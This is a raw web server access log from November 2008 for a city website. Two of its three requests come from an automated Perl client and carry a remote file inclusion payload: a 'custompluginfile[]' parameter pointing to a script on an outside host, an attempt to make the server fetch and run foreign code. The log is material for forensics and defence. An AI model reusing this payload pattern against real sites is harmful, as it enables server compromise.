78.157.143.211 - - [15/Nov/2008:05:25:01 -0800] "GET /jodera2/profile.php?mode=editprofile HTTP/1.0" 200 34945 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.sancarloscity.org"
89.149.254.185 - - [15/Nov/2008:05:25:03 -0800] "GET /logs/access_081006.log//?custompluginfile[]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 760 "-" "libwww-perl/5.813" "www.sancarloscity.org"
89.149.254.185 - - [15/Nov/2008:05:25:03 -0800] "GET /?custompluginfile[]=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 200 44225 "-" "libwww-perl/5.813" "www.sancarloscity.org"
